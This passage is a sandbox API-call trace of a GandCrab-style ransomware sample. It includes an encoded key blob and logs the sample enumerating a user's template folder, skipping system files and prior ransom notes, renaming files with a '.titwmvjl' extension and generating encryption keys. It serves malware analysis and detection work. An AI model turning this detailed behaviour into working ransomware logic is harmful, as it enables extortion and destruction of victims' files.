a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0078.170] WriteFile (in: hFile=0x2e4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e068, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e068*=0x2162, lpOverlapped=0x0) returned 1 [0078.172] CloseHandle (hObject=0x2e4) returned 1 [0078.172] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.172] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0078.172] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x17, wMilliseconds=0x1e3)) [0078.172] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.173] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0078.173] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0078.173] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\d2ca4a09d2ca4deb61a.lock") returned 128 [0078.173] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2e4 [0078.173] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.174] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.174] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\") returned 104 [0078.174] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\*" [0078.174] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\*", fInfoLevelId=0x1, lpFindFileData=0x259e084, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e084) returned 0x503738 [0078.174] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.174] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0078.175] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.175] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.175] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0078.175] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0078.175] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0078.175] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\d2ca4a09d2ca4deb61a.lock" [0078.175] lstrlenW (lpString=".titwmvjl") returned 9 [0078.175] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\d2ca4a09d2ca4deb61a.lock") returned 128 [0078.175] VirtualAlloc (lpAddress=0x0, dwSize=0x140, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0078.175] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 137 [0078.175] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\d2ca4a09d2ca4deb61a.lock") returned 128 [0078.175] lstrlenW (lpString=".lock") returned 5 [0078.175] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.176] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0078.176] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.176] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.176] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0078.176] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0078.176] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0078.176] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TITWMVJL-DECRYPT.txt" [0078.176] lstrlenW (lpString=".titwmvjl") returned 9 [0078.176] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TITWMVJL-DECRYPT.txt") returned 124 [0078.176] VirtualAlloc (lpAddress=0x0, dwSize=0x138, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0078.176] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 133 [0078.176] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TITWMVJL-DECRYPT.txt") returned 124 [0078.176] lstrlenW (lpString=".txt") returned 4 [0078.176] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.177] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0078.177] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0078.177] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.177] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TITWMVJL-DECRYPT.txt") returned 124 [0078.177] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TITWMVJL-DECRYPT.txt") returned 124 [0078.177] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0078.177] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0078.177] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0078.177] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0078.177] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0078.177] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0078.177] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0078.177] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0078.177] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.177] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0078.177] lstrcmpW (lpString1="TM03328884[[fn=architecture]].glox", lpString2=".") returned 1 [0078.177] lstrcmpW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="..") returned 1 [0078.177] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328884[[fn=architecture]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328884[[fn=architecture]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328884[[fn=architecture]].glox" [0078.178] lstrlenW (lpString=".titwmvjl") returned 9 [0078.178] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328884[[fn=architecture]].glox") returned 138 [0078.178] VirtualAlloc (lpAddress=0x0, dwSize=0x154, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0078.178] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328884[[fn=architecture]].glox.titwmvjl") returned 147 [0078.178] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328884[[fn=architecture]].glox") returned 138 [0078.178] lstrlenW (lpString=".glox") returned 5 [0078.178] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.178] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".glox ") returned 6 [0078.178] lstrcmpiW (lpString1=".glox", lpString2=".titwmvjl") returned -1 [0078.178] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.178] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328884[[fn=architecture]].glox") returned 138 [0078.178] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328884[[fn=architecture]].glox") returned 138 [0078.178] lstrcmpiW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="desktop.ini") returned 1 [0078.178] lstrcmpiW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="autorun.inf") returned 1 [0078.178] lstrcmpiW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="ntuser.dat") returned 1 [0078.178] lstrcmpiW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="iconcache.db") returned 1 [0078.178] lstrcmpiW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="bootsect.bak") returned 1 [0078.178] lstrcmpiW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="boot.ini") returned 1 [0078.178] lstrcmpiW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="ntuser.dat.log") returned 1 [0078.178] lstrcmpiW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="thumbs.db") returned 1 [0078.179] lstrcmpiW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0078.179] lstrcmpiW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0078.179] lstrcmpiW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0078.179] lstrcmpiW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="CRAB-DECRYPT.html") returned 1 [0078.179] lstrcmpiW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0078.179] lstrcmpiW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0078.179] lstrcmpiW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="ntldr") returned 1 [0078.179] lstrcmpiW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="NTDETECT.COM") returned 1 [0078.179] lstrcmpiW (lpString1="TM03328884[[fn=architecture]].glox", lpString2="Bootfont.bin") returned 1 [0078.179] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328884[[fn=architecture]].glox") returned 138 [0078.179] lstrlenW (lpString=".glox") returned 5 [0078.179] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.179] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".glox ") returned 6 [0078.179] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.179] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.179] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328884[[fn=architecture]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328884[[fn=architecture]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0078.180] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.180] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0078.190] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.190] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.190] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0078.191] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0078.191] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0078.191] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0078.191] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0078.191] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.192] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.192] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.192] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.192] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0078.193] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0078.193] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0078.193] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0078.193] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0078.193] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.193] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.193] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 